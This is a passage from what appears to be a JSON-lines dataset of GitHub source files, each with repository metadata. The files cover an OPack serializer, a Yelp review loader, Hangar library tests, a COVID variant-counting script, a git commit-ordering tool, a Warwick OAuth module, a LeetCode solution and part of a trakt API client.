elif obj_len < 2 ** 64:\n return 0x94\n raise BytesTooLargeError(f'bytes are too large ({obj_len})')\n\n\ndef _get_list_object_type(obj) -> int:\n if len(obj) < 15:\n return 0xD0 + len(obj)\n else:\n obj = copy.copy(obj)\n obj.append(TerminatorObject())\n return 0xDF, obj\n\n\ndef _get_dict_object_type(obj) -> Tuple[int, list]:\n obj_len = len(obj)\n obj = list(obj.items())\n if obj_len < 15:\n return 0xE0 + obj_len, obj\n else:\n obj.append((TerminatorObject(), TerminatorObject()))\n return 0xEF, obj\n\n\nOBJ_TYPE_MAP = {\n bool: _get_bool_object_type, datetime.datetime: _get_datetime_object_time, TerminatorObject: _get_set_object_type,\n int: _get_int_object_type, float: _get_float_object_type, str: _get_str_object_type,\n bytes: _get_bytes_object_type, list: _get_list_object_type, dict: _get_dict_object_type\n}\n\n\nclass OPackObjectType(Enum):\n BOOL = auto()\n TERMINATOR = auto()\n TIMESTAMP = auto()\n INT = auto()\n STRING = auto()\n BYTES = auto()\n ARRAY_LENGTHED = auto()\n ARRAY_TERMINATED = auto()\n DICT_LENGTHED = auto()\n DICT_TERMINATED = auto()\n\n @staticmethod\n def get_type(obj_type) -> 'OPackObjectType':\n if obj_type == 1 or obj_type == 2:\n return OPackObjectType.BOOL\n if obj_type == 3:\n return OPackObjectType.TERMINATOR\n if obj_type == 6:\n return OPackObjectType.TIMESTAMP\n if 8 <= obj_type <= 0x36 and obj_type != 0x31 and obj_type != 0x34:\n return OPackObjectType.INT\n if 0x40 <= obj_type <= 0x64:\n return OPackObjectType.STRING\n if 0x70 <= obj_type <= 0x94:\n return OPackObjectType.BYTES\n if 0xD0 <= obj_type <= 0xDF:\n if obj_type == 0xDF:\n return OPackObjectType.ARRAY_TERMINATED\n return OPackObjectType.ARRAY_LENGTHED\n if 0xE0 <= obj_type <= 0xEF:\n if obj_type == 0xEF:\n return OPackObjectType.DICT_TERMINATED\n return OPackObjectType.DICT_LENGTHED\n raise InvalidTypeError(f'Invalid object type: {obj_type}')\n","repo_name":"loriwitt/opack","sub_path":"opack/object_types.py","file_name":"object_types.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"70096642337","text":"from __future__ import print_function\nimport pandas as pd\nimport psycopg2\nimport pkg_resources\n\nfrom helper.text_preprocessing import add_negation\nfrom nltk.stem.snowball import SnowballStemmer\n\n\n\"\"\"\nScripts to parse the data and store in\nmanageable formats / read data into\npandas DataFrame\n\nresources in /data\n\"\"\"\n\n\ndef merge():\n \"\"\"\n merge academic and phoenix datasets\n \"\"\"\n print(\"Reading files...\")\n file1 = pkg_resources.resource_filename(__name__, \"/data/academic_review.csv\")\n file2 = pkg_resources.resource_filename(__name__, \"/data/phoenix_review.csv\")\n output = pkg_resources.resource_filename(__name__, \"/data/training_review.csv\")\n df1 = pd.read_csv(file1, index_col=0)\n df2 = pd.read_csv(file2, index_col=0)\n df = pd.concat([df1, df2])\n print(\"Done.\")\n print(\"Writing...\")\n df.to_csv(output, index=False)\n print(\"Done.\")\n\n\ndef _add_line(cursor, values):\n \"\"\"\n Insert a line in the database\n \"\"\"\n values['votes'] = values['votes'].replace(\"'\", '\"')\n values['votes'] = values['votes'].replace('u\"', '\"')\n cursor.execute(\"\"\"INSERT INTO review (business_id, date, review_id, stars, text, type, votes)\n VALUES (%(business_id)s, %(date)s, %(review_id)s, %(stars)s, %(text)s, %(type)s, %(votes)s)\"\"\",\n values)\n\n\ndef create_db(database, user, password):\n \"\"\"\n Write data into postgres database\n \"\"\"\n source = pkg_resources.resource_filename(__name__, \"data/training_review.csv\")\n df = pd.read_csv(source)\n connection = psycopg2.connect(database=database, user=user, password=password)\n cursor = connection.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS review\")\n cursor.execute(\"CREATE TABLE review (\"\n \" business_id CHAR(22),\"\n \" date DATE,\"\n \" review_id CHAR(22),\"\n \" stars SMALLINT,\"\n \" text TEXT,\"\n \" type CHAR(6),\"\n \" user_id CHAR(22),\"\n \" votes JSON\"\n \")\")\n for row in df.iterrows():\n values = dict(row[1])\n _add_line(cursor, values)\n connection.commit()\n cursor.close()\n connection.close()\n\n\ndef _stemmed_set(training=True):\n \"\"\"\n create csv file with stemmed reviews\n \"\"\"\n if training:\n df = read_yelp_set(['text', 'stars'])\n data = 'training'\n else:\n df = read_yelp_set(['text', 'stars'], data='test')\n data = 'test'\n stemmer = SnowballStemmer(\"english\")\n\n def stem(word):\n try:\n return stemmer.stem(word)\n except:\n return word\n\n df.text = [u' '.join(map(stem, text.split())) for text in df.text]\n filename = pkg_resources.resource_filename(__name__, 'data/stemmed_%s_review.csv' % data)\n with open(filename, \"w+\") as output:\n df.to_csv(output, encoding='utf8', index=False)\n\n\ndef read_yelp_set(columns=None, data='training', stem=False, preprocess=False):\n \"\"\"\n Read yelp data set into a Pandas DataFrame\n :param columns: list columns to return\n :param data: 'training' or 'test'\n :param stem: stem words in 'text' column if True\n :param preprocess:\n :return: pandas dataframe\n \"\"\"\n if not data in ['training', 'test']:\n raise ValueError('data must be either \"training\" or \"test\"')\n if stem:\n prfix = \"stemmed_\"\n else:\n prfix = \"\"\n filename = pkg_resources.resource_filename(__name__, \"data/%s%s_review.csv\" % (prfix, data))\n df = pd.read_csv(filename, encoding='utf8').fillna(u'')\n if columns:\n df = df[columns]\n if preprocess:\n df.text = add_negation(map(unicode.lower, df.text))\n return df\n\n\ndef training_set():\n \"\"\"\n :return: a DataFrame consisting of stemmed text reviews and star ratings\n from the training set\n \"\"\"\n return read_yelp_set(['text', 'stars'], stem=True, preprocess=True)\n\n\ndef test_set():\n \"\"\"\n :return: a DataFrame consisting of stemmed text reviews and ratings\n from the test set.\n \"\"\"\n return read_yelp_set(['text', 'stars'], data='test', stem=True, preprocess=True)\n\nif __name__ == \"__main__\":\n _stemmed_set(training=False)","repo_name":"tianhuil/dataprojects","sub_path":"francesco/yelp_data.py","file_name":"yelp_data.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"19197532670","text":"import os\nimport pytest\nfrom hangar import Repository\n\n\ndef test_imports():\n import hangar\n from hangar import Repository\n\n\ndef test_starting_up_repo_warns_should_exist_no_args(managed_tmpdir):\n with pytest.warns(UserWarning):\n repo = Repository(path=managed_tmpdir)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n assert repo.list_branches() == ['master']\n assert os.path.isdir(repo._repo_path)\n assert str(repo._repo_path) == os.path.join(managed_tmpdir, '.hangar')\n co = repo.checkout(write=True)\n assert co.diff.status() == 'CLEAN'\n co.close()\n repo._env._close_environments()\n\n\ndef test_starting_up_repo_warns_should_exist_manual_args(managed_tmpdir):\n with pytest.warns(UserWarning):\n repo = Repository(path=managed_tmpdir, exists=True)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n assert repo.list_branches() == ['master']\n assert os.path.isdir(repo._repo_path)\n assert str(repo._repo_path) == os.path.join(managed_tmpdir, '.hangar')\n co = repo.checkout(write=True)\n assert co.diff.status() == 'CLEAN'\n co.close()\n repo._env._close_environments()\n\n\ndef test_starting_up_repo_does_not_warn_not_exist_manual_args(managed_tmpdir):\n with pytest.warns(None) as warn_recs:\n repo = Repository(path=managed_tmpdir, exists=False)\n assert len(warn_recs) == 0\n\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n assert repo.list_branches() == ['master']\n assert os.path.isdir(repo._repo_path)\n assert str(repo._repo_path) == os.path.join(managed_tmpdir, '.hangar')\n co = repo.checkout(write=True)\n assert co.diff.status() == 'CLEAN'\n co.close()\n repo._env._close_environments()\n\n\ndef test_initial_read_checkout(managed_tmpdir):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n with pytest.raises(ValueError):\n repo.checkout()\n repo._env._close_environments()\n\n\ndef test_initial_arrayset(managed_tmpdir, randomsizedarray):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n\n w_checkout = repo.checkout(write=True)\n assert len(w_checkout.columns) == 0\n with pytest.raises(KeyError):\n w_checkout.columns['aset']\n aset = w_checkout.add_ndarray_column('aset', prototype=randomsizedarray)\n assert aset.column == 'aset'\n w_checkout.close()\n repo._env._close_environments()\n\n\ndef test_empty_commit(managed_tmpdir, caplog):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n w_checkout = repo.checkout(write=True)\n with pytest.raises(RuntimeError):\n w_checkout.commit('this is a merge message')\n w_checkout.close()\n repo._env._close_environments()\n\n\ndef test_cannot_operate_without_repo_init(managed_tmpdir):\n repo = Repository(path=managed_tmpdir, exists=False)\n\n with pytest.raises(RuntimeError):\n repo.writer_lock_held()\n with pytest.raises(RuntimeError):\n repo.checkout()\n with pytest.raises(RuntimeError):\n repo.writer_lock_held()\n with pytest.raises(RuntimeError):\n repo.log()\n with pytest.raises(RuntimeError):\n repo.summary()\n with pytest.raises(RuntimeError):\n repo.merge('fail', 'master', 'nonexistant')\n with pytest.raises(RuntimeError):\n repo.create_branch('test')\n with pytest.raises(RuntimeError):\n repo.list_branches()\n with pytest.raises(RuntimeError):\n repo.force_release_writer_lock()\n\n with pytest.raises(RuntimeError):\n repo.remote.add('origin', 'foo')\n with pytest.raises(RuntimeError):\n repo.remote.remove('origin')\n with pytest.raises(RuntimeError):\n repo.remote.fetch('origin', 'master')\n with pytest.raises(RuntimeError):\n repo.remote.fetch_data('origin', branch='master')\n with pytest.raises(RuntimeError):\n repo.remote.list_all()\n with pytest.raises(RuntimeError):\n repo.remote.ping('origin')\n with pytest.raises(RuntimeError):\n repo.remote.push('origin', 'master')\n with pytest.raises(RuntimeError):\n repo.remove_branch('master')\n\n with pytest.raises(RuntimeError):\n repo.path\n with pytest.raises(RuntimeError):\n repo.version\n with pytest.raises(RuntimeError):\n repo.writer_lock_held\n with pytest.raises(RuntimeError):\n repo.size_human\n with pytest.raises(RuntimeError):\n repo.size_nbytes\n\n assert repo._env.repo_is_initialized is False\n\n\ndef test_check_repo_size(repo_20_filled_samples):\n from hangar.utils import parse_bytes, folder_size\n\n expected_nbytes = folder_size(repo_20_filled_samples._repo_path, recurse=True)\n nbytes = repo_20_filled_samples.size_nbytes\n assert expected_nbytes == nbytes\n\n format_nbytes = repo_20_filled_samples.size_human\n # account for rounding when converting int to str.\n assert nbytes * 0.95 <= parse_bytes(format_nbytes) <= nbytes * 1.05\n\n\ndef test_force_release_writer_lock(managed_tmpdir, monkeypatch):\n\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n co = repo.checkout(write=True)\n orig_lock = str(co._writer_lock)\n\n def mock_true(*args, **kwargs):\n return True\n\n # try to release the writer lock with a process which has different uid\n co._writer_lock = 'lololol'\n with pytest.raises(RuntimeError):\n monkeypatch.setattr(co, '_verify_alive', mock_true)\n monkeypatch.setattr(co._columns, '_destruct', mock_true)\n co.close()\n # replace, but rest of object is closed\n monkeypatch.setattr(co, '_writer_lock', orig_lock)\n monkeypatch.delattr(co._columns, '_destruct')\n co.close()\n repo._env._close_environments()\n\n\ndef test_force_release_writer_lock_works(managed_tmpdir):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n co = repo.checkout(write=True)\n\n # try to release the writer lock with a process which has different uid\n with pytest.warns(ResourceWarning):\n repo.force_release_writer_lock()\n\n co._writer_lock == 'LOCK_AVAILABLE'\n co.close()\n # replace, but rest of object is closed\n repo._env._close_environments()\n\n\ndef test_repo_summary_does_not_error_before_any_commit_made(capfd, managed_tmpdir):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n\n assert repo.summary() is None\n out, _ = capfd.readouterr()\n assert 'No commits have been made in the repository' in out\n repo._env._close_environments()\n\n\ndef test_get_ecosystem_details(managed_tmpdir):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n eco = repo._ecosystem_details()\n assert isinstance(eco, dict)\n assert 'host' in eco\n assert 'packages' in eco\n for package_name, version in eco['packages']:\n assert version is not None\n repo._env._close_environments()\n\n\ndef test_inject_repo_version(monkeypatch):\n import hangar\n monkeypatch.setattr(\"hangar.__version__\", '0.2.0')\n assert hangar.__version__ == '0.2.0'\n\n\ndef test_check_repository_version(aset_samples_initialized_repo):\n from hangar import __version__\n from pkg_resources import parse_version\n\n repo = aset_samples_initialized_repo\n assert repo.version == parse_version(__version__).public\n\n\ndef test_check_repository_software_version_startup(managed_tmpdir):\n from hangar import Repository, __version__\n from pkg_resources import parse_version\n\n repo = Repository(managed_tmpdir, exists=False)\n repo.init('test user', 'test@foo.bar', remove_old=True)\n repo._env._close_environments()\n\n nrepo = Repository(managed_tmpdir, exists=True)\n assert nrepo.initialized is True\n assert nrepo.version == parse_version(__version__).public\n nrepo._env._close_environments()\n\n\n@pytest.mark.parametrize('repo_v,hangar_v', [\n ['0.2.0', '0.3.0'],\n ['0.2.0', '0.3.1rc1'],\n ['0.2.0', '0.3.1.dev0'],\n ['0.2.0', '0.3.1'],\n ['0.3.0', '0.4.1.dev0'],\n ['0.3.0', '0.4.1rc1'],\n ['0.3.0', '0.4.0'],\n ['0.3.0', '0.4.1'],\n ['0.4.0', '0.5.0.dev0'],\n ['0.4.0', '0.5.0rc1'],\n ['0.4.0', '0.5.0'],\n ['0.4.0', '0.5.1'],\n ['0.5.0.dev0', '0.4.0'],\n ['0.5.0.dev0', '0.4.1'],\n ['0.5.0', '0.4.1'],\n])\ndef test_check_repository_software_version_fails_hangar_version(monkeypatch, managed_tmpdir, repo_v, hangar_v):\n import hangar\n monkeypatch.setattr(\"hangar.__version__\", hangar_v)\n monkeypatch.setattr(\"hangar.context.__version__\", hangar_v)\n from hangar import Repository\n from hangar.records.vcompat import set_repository_software_version\n\n repo = Repository(managed_tmpdir, exists=False)\n repo.init('test user', 'test@foo.bar', remove_old=True)\n # force writing of new software version. should trigger error on next read.\n set_repository_software_version(repo._env.branchenv, repo_v, overwrite=True)\n try:\n assert repo.version == repo_v\n finally:\n repo._env._close_environments()\n\n assert hangar.__version__ == hangar_v\n\n with pytest.raises(RuntimeError):\n Repository(managed_tmpdir, exists=True)\n\n\n@pytest.mark.parametrize('futureVersion', ['1.0.0', '0.14.1', '0.15.0', '1.4.1'])\ndef test_check_repository_software_version_works_on_newer_hangar_version(managed_tmpdir, monkeypatch, futureVersion):\n from hangar import Repository\n\n repo = Repository(managed_tmpdir, exists=False)\n repo.init('test user', 'test@foo.bar', remove_old=True)\n old_version = repo.version\n # force writing of new software version. should trigger error on next read.\n repo._env._close_environments()\n\n import hangar\n monkeypatch.setattr(hangar, '__version__', futureVersion)\n nrepo = Repository(managed_tmpdir, exists=True)\n assert hangar.__version__ == futureVersion\n assert nrepo.version == old_version\n nrepo._env._close_environments()\n","repo_name":"tensorwerk/hangar-py","sub_path":"tests/test_initiate.py","file_name":"test_initiate.py","file_ext":"py","file_size_in_byte":10276,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"34"} +{"seq_id":"31586381562","text":"# Convert GISAID metadata file to day counts:\n# \n# Suitable of binomial regression\n\nimport argparse\nparser=argparse.ArgumentParser()\nparser.add_argument('-v', '--variant', type=str,default=\"BA.2.86\", help=\"Name of variant\")\n#parser.add_argument('-m', '--mutation', type=str,default=\"\", help=\"Key mutations\")\nparser.add_argument('-f', '--mindate', default=\"2019-01-01\", help=\"Min sample date of sequence\")\nparser.add_argument('-t', '--maxdate', default=\"9999-12-31\", help=\"Max sample date of sequence\")\nparser.add_argument('-g', '--gisaid', action=\"store_true\", help=\"Use GISAID data instead of COG-UK data\")\nargs=parser.parse_args()\n\nfrom stuff import *\nfp=sys.stdin\nif args.gisaid:\n keys=[\"Collection date\",\"Lineage\",\"AA Substitutions\"]\n sep=\"\\t\"\n keymutations=[\"NSP2_A31D\",\"Spike_L452W\",\"M_T30A\",\"NSP3_N1708S\",\"Spike_I332V\",\"Spike_V445H\",\"Spike_E484K\",\"N_Q229K\",\"Spike_A264D\",\"Spike_V127F\",\"Spike_S50L\"]\nelse:\n keys=[\"sample_date\",\"lineage\",\"mutations\"]\n sep=\",\"\n keymutations=[\"orf1ab:A211D\",\"S:L452W\",\"M:T30A\",\"orf1ab:N2526S\",\"S:I332V\",\"S:V445H\",\"S:E484K\",\"N:Q229K\",\"S:A264D\",\"S:V127F\",\"S:S50L\"]\n\nd={}\nfor (date,lineage,mutations) in csvrows_it(fp,keys,sep=sep):\n if len(date)!=10 or dateargs.maxdate: continue\n if date not in d: d[date]=[0,0]\n if lineage==\"\": continue\n var=int(lineage.split()[0]==args.variant)\n if not var:\n n=len(keymutations)\n k=len([m for m in keymutations if m in mutations])\n if k>n/2: var=1\n d[date][var]+=1\n\nfor date in sorted(list(d)):\n print(date,\"%6d %6d\"%tuple(d[date]))\n","repo_name":"alex1770/Covid-19","sub_path":"VOCgrowth/BA.2.86_estimates/conv_to_daycounts.py","file_name":"conv_to_daycounts.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"39886823013","text":"#!/usr/bin/python3\n\n# Prithvi Kannan\n# UID: 405110096\n\nimport os\nimport zlib\nimport sys\n\nclass CommitNode:\n def __init__(self, commit_hash):\n \"\"\"\n :type commit_hash: str\n \"\"\"\n self.commit_hash = commit_hash\n self.parents = set()\n self.children = set()\n\n def __str__(self):\n return 'Commit Hash: ' + self.commit_hash\n\ndef getObjectDir():\n top_level = find_root(os.getcwd())\n object_dir = top_level + '/.git/objects/'\n return object_dir\n\ndef find_root(test, dirs=(\".git\",), default=None):\n import os\n prev, test = None, os.path.abspath(test)\n while prev != test:\n if any(os.path.isdir(os.path.join(test, d)) for d in dirs):\n return test\n prev, test = test, os.path.abspath(os.path.join(test, os.pardir))\n sys.stderr.write('Not inside a Git repository')\n exit(1)\n\ndef get_parents_of(hash):\n parent_hashes = []\n path = getObjectDir() + hash[:2] + '/' + hash[2:]\n contents = zlib.decompress(open(path, 'rb').read())\n if (contents[:6] == b'commit'):\n contents = contents.decode().split('\\n')\n for line in sorted(contents):\n if(line[:6] == 'parent'):\n parent_hash = line[7:]\n parent_hashes.append(parent_hash)\n return parent_hashes\n\ndef print_graph(nodes):\n for hash in sorted(nodes.keys()):\n node = nodes[hash]\n print('node - ' + node.commit_hash) \n for children in sorted(node.children):\n print('child - ', end='')\n print(children)\n for parent in sorted(node.parents):\n print('parent - ', end='')\n print(parent)\n print()\n\ndef build_graph(branch_hash):\n nodes = {}\n for hash in sorted(branch_hash.keys()):\n file_name = getObjectDir() + hash[:2] + '/' + hash[2:]\n contents = zlib.decompress(open(file_name, 'rb').read())\n if (contents[:6] == b'commit'):\n stack = [hash]\n while(len(stack) != 0):\n curr = stack.pop()\n if curr not in nodes:\n curr_node = CommitNode(curr)\n else:\n curr_node = nodes[curr]\n parents = get_parents_of(curr)\n for parent in sorted(parents):\n curr_node.parents.add(parent)\n if parent not in nodes:\n stack.append(parent)\n parent_node = CommitNode(parent)\n else:\n parent_node = nodes[parent]\n parent_node.children.add(curr)\n nodes[parent] = parent_node\n nodes[curr] = curr_node\n return nodes\n\ndef DFS_topo(nodes):\n visited = set()\n order = []\n sources = []\n for hash in sorted(nodes):\n if len(nodes[hash].parents) == 0:\n sources.append(hash)\n for source in sources:\n if source not in visited:\n stack = [source]\n while len(stack) != 0:\n curr = stack.pop()\n if curr not in visited:\n if len(nodes[curr].parents) > 1:\n path = []\n new_visited = []\n for parent in sorted(nodes[curr].parents):\n if parent not in visited:\n path = [parent]\n visited.add(parent)\n while len(path) != 0:\n new_curr = path.pop()\n for parent in sorted(nodes[new_curr].parents):\n if parent not in visited:\n path.append(parent)\n new_visited.append(new_curr)\n visited.add(new_curr)\n order.extend(new_visited[::-1])\n for c in sorted(nodes[curr].children):\n if c not in visited:\n stack.append(c)\n order.append(curr)\n visited.add(curr)\n return order\n\ndef get_branches(top_level):\n branch_hash = {}\n branches = os.listdir(top_level + '/.git/refs/heads/')\n for b in sorted(branches):\n hash = open(top_level + '/.git/refs/heads/' +\n b, 'r').read().strip('\\n')\n if hash not in branch_hash:\n temp = set()\n else:\n temp = branch_hash[hash]\n temp.add(b)\n branch_hash[hash] = temp\n return branch_hash\n\ndef print_topo_order(nodes, order, branch_hash):\n i = 0\n sticky = False\n while i < len(order):\n curr_id = order[i]\n curr_node = nodes[curr_id]\n if sticky:\n sticky = False\n sticky_start = \"=\"\n for child in sorted(curr_node.children):\n sticky_start += f'{child} '\n sticky_start = sticky_start.rstrip()\n print(sticky_start)\n print(curr_id, end='')\n if curr_id in branch_hash:\n for b in sorted(branch_hash[curr_id]):\n print(' ' + b, end='')\n print()\n if i != len(order) - 1:\n next_id = order[i+1]\n next_node = nodes[next_id]\n if curr_id not in next_node.children:\n end = \"\"\n for parent in sorted(curr_node.parents):\n end += f'{parent} '\n print(end.strip()+'=')\n print()\n sticky = True\n i += 1\n\ndef topo_order_commits():\n top_level = find_root(os.getcwd())\n branch_hash = get_branches(top_level)\n nodes = build_graph(branch_hash)\n order = DFS_topo(nodes)[::-1]\n return print_topo_order(nodes, order, branch_hash)\n\nif __name__ == '__main__':\n topo_order_commits()\n","repo_name":"prithvikannan/cs-35l","sub_path":"assignment9/topo_order_commits.py","file_name":"topo_order_commits.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8593579659","text":"\"\"\"\nMethods that are used to authenticate the user with the Warwick oauth API\n\"\"\"\nimport urllib.parse\n\nfrom oauthlib.oauth1 import SIGNATURE_HMAC, SIGNATURE_TYPE_AUTH_HEADER\nfrom requests_oauthlib import OAuth1Session\nfrom django.conf import settings\n\nfrom .utils import CustomClient\nfrom .models import User, RequestTokenStore\nfrom .tabula import retreive_member_infomation\n\nACCESS_TOKEN_URL = \"https://websignon.warwick.ac.uk/oauth/accessToken\"\nAUTHORISE_URL = \"https://websignon.warwick.ac.uk/oauth/authorise?\"\nREQUEST_TOKEN_URL = \"https://websignon.warwick.ac.uk/oauth/requestToken?\"\n\nSCOPES = \"urn:websignon.warwick.ac.uk:sso:service urn:tabula.warwick.ac.uk:tabula:service\"\n\ndef obtain_request_token(callback='http://127.0.0.1:8000/callback/', expiry='forever'):\n \"\"\"\n This method obtains a request token by sending a signed request. Returns \n a url to redirect the user in order to authorize the token.\n \"\"\"\n oauth = OAuth1Session(\n settings.CONSUMER_KEY, \n client_secret=settings.CONSUMER_SECRET,\n signature_method=SIGNATURE_HMAC,\n signature_type=SIGNATURE_TYPE_AUTH_HEADER, \n client_class=CustomClient,\n callback_uri=callback\n )\n response = oauth.fetch_request_token(\n url=REQUEST_TOKEN_URL + urllib.parse.urlencode({'scope': SCOPES, 'expiry': expiry})\n )\n # store the oauth_token_secret for later use when getting access token\n RequestTokenStore.objects.create(\n oauth_token=response['oauth_token'],\n oauth_token_secret=response['oauth_token_secret']\n )\n\n authorise_qs = urllib.parse.urlencode({'oauth_token': response['oauth_token']})\n return AUTHORISE_URL + authorise_qs\n\n\ndef exchange_access_token(oauth_token, returned_url, user_id):\n \"\"\"\n This method gets an access token using an authorized request token. It then\n either retrive an exisiting user with the given user_id or create a new user.\n If a new User is created, their module info is populated. Returns the user.\n \"\"\"\n aouth_secret = RequestTokenStore.get_secret(oauth_token)\n oauth = OAuth1Session(\n settings.CONSUMER_KEY,\n settings.CONSUMER_SECRET,\n resource_owner_secret=aouth_secret, \n client_class=CustomClient\n )\n oauth.parse_authorization_response(returned_url)\n access_tokens = oauth.fetch_access_token(ACCESS_TOKEN_URL)\n\n user = User.objects.filter(user_id=user_id).first()\n if user is None:\n # email will be set to their actual email in retreive_member_infomation().\n user = User.objects.create(\n email=user_id+'@email.com',\n user_id=user_id,\n access_token=access_tokens['oauth_token'],\n access_token_secret=access_tokens['oauth_token_secret']\n )\n retreive_member_infomation(user, created=True)\n else:\n user.access_token = access_tokens['oauth_token']\n user.access_token_secret = access_tokens['oauth_token_secret']\n user.save()\n retreive_member_infomation(user)\n\n # delete tokens from account as not needed anymore.\n user.access_token = ''\n user.access_token_secret = ''\n user.save()\n # send user object back to view to be logged in.\n return user","repo_name":"maxamuss/Warwick-CATulator","sub_path":"users/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"14883816525","text":"#\n# @lc app=leetcode.cn id=2215 lang=python3\n#\n# [2215] 找出两数组的不同\n#\n# https://leetcode-cn.com/problems/find-the-difference-of-two-arrays/description/\n#\n# algorithms\n# Easy (66.81%)\n# Likes: 6\n# Dislikes: 0\n# Total Accepted: 9.6K\n# Total Submissions: 14.4K\n# Testcase Example: '[1,2,3]\\n[2,4,6]'\n#\n# 给你两个下标从 0 开始的整数数组 nums1 和 nums2 ,请你返回一个长度为 2 的列表 answer ,其中:\n#\n#\n# answer[0] 是 nums1 中所有 不 存在于 nums2 中的 不同 ���数组成的列表。\n# answer[1] 是 nums2 中所有 不 存在于 nums1 中的 不同 整数组成的列表。\n#\n#\n# 注意:列表中的整数可以按 任意 顺序返回。\n#\n#\n#\n# 示例 1:\n#\n#\n# 输入:nums1 = [1,2,3], nums2 = [2,4,6]\n# 输出:[[1,3],[4,6]]\n# 解释:\n# 对于 nums1 ,nums1[1] = 2 出现在 nums2 中下标 0 处,然而 nums1[0] = 1 和 nums1[2] = 3 没有出现在\n# nums2 中。因此,answer[0] = [1,3]。\n# 对于 nums2 ,nums2[0] = 2 出现在 nums1 中下标 1 处,然而 nums2[1] = 4 和 nums2[2] = 6 没有出现在\n# nums2 中。因此,answer[1] = [4,6]。\n#\n# 示例 2:\n#\n#\n# 输入:nums1 = [1,2,3,3], nums2 = [1,1,2,2]\n# 输出:[[3],[]]\n# 解释:\n# 对于 nums1 ,nums1[2] 和 nums1[3] 没有出现在 nums2 中。由于 nums1[2] == nums1[3] ,二者的值只需要在\n# answer[0] 中出现一次,故 answer[0] = [3]。\n# nums2 中的每个整数都在 nums1 中出现,因此,answer[1] = [] 。\n#\n#\n#\n#\n# 提示:\n#\n#\n# 1 <= nums1.length, nums2.length <= 1000\n# -1000 <= nums1[i], nums2[i] <= 1000\n#\n#\n#\n\nfrom typing import List\n\n\n# @lc code=start\nclass Solution:\n\n def findDifference(self, nums1: List[int],\n nums2: List[int]) -> List[List[int]]:\n\n ns1, ns2 = set(nums1), set(nums2)\n\n return [list(ns1.difference(ns2)), list(ns2.difference(ns1))]\n\n\n# @lc code=end\n","repo_name":"1m188/algorithm","sub_path":"leetcode/1/2215.找出两数组的不同.py","file_name":"2215.找出两数组的不同.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7878494274","text":"# -*- coding: utf-8 -*-\n\"\"\"Objects, properties, and methods to be shared across other modules in the\ntrakt package\n\"\"\"\nfrom __future__ import print_function\nimport json\nimport logging\nimport os\nimport requests\nimport six\nimport sys\nfrom collections import namedtuple\nfrom functools import wraps\nfrom requests_oauthlib import OAuth2Session\nfrom trakt import errors\n\n__author__ = 'Jon Nappi'\n__all__ = ['Airs', 'Alias', 'Comment', 'Genre', 'get', 'delete', 'post', 'put',\n 'init', 'BASE_URL', 'CLIENT_ID', 'CLIENT_SECRET', 'REDIRECT_URI',\n 'HEADERS', 'CONFIG_PATH', 'OAUTH_TOKEN', 'PIN_AUTH', 'OAUTH_AUTH',\n 'AUTH_METHOD', 'APPLICATION_ID']\n\n#: The base url for the Trakt API. Can be modified to run against different\n#: Trakt.tv environments\nBASE_URL = 'https://api-v2launch.trakt.tv/'\n\n#: The Trakt.tv OAuth Client ID for your OAuth Application\nCLIENT_ID = None\n\n#: The Trakt.tv OAuth Client Secret for your OAuth Application\nCLIENT_SECRET = None\n\n#: The OAuth2 Redirect URI for your OAuth Application\nREDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'\n\n#: Default request HEADERS\nHEADERS = {'Content-Type': 'application/json', 'trakt-api-version': '2'}\n\n#: Default path for where to store your trakt.tv API authentication information\nCONFIG_PATH = os.path.join(os.path.expanduser('~'), '.pytrakt.json')\n\n#: Your personal Trakt.tv OAUTH Bearer Token\nOAUTH_TOKEN = api_key = None\n\n#: Flag used to enable Trakt PIN authentication\nPIN_AUTH = 'PIN'\n\n#: Flag used to enable Trakt OAuth authentication\nOAUTH_AUTH = 'OAUTH'\n\n#: The currently enabled authentication method. Default is ``PIN_AUTH``\nAUTH_METHOD = PIN_AUTH\n\n#: The ID of the application to register with, when using PIN authentication\nAPPLICATION_ID = None\n\n\ndef _store(**kwargs):\n \"\"\"Helper function used to store Trakt configurations at ``CONFIG_PATH``\n\n :param kwargs: Keyword args to store at ``CONFIG_PATH``\n \"\"\"\n with open(CONFIG_PATH, 'w') as config_file:\n json.dump(kwargs, config_file)\n\n\ndef _get_client_info(app_id=False):\n \"\"\"Helper function to poll the user for Client ID and Client Secret\n strings\n\n :return: A 2-tuple of client_id, client_secret\n \"\"\"\n global APPLICATION_ID\n print('If you do not have a client ID and secret. Please visit the '\n 'following url to create them.')\n print('http://trakt.tv/oauth/applications')\n client_id = six.moves.input('Please enter your client id: ')\n client_secret = 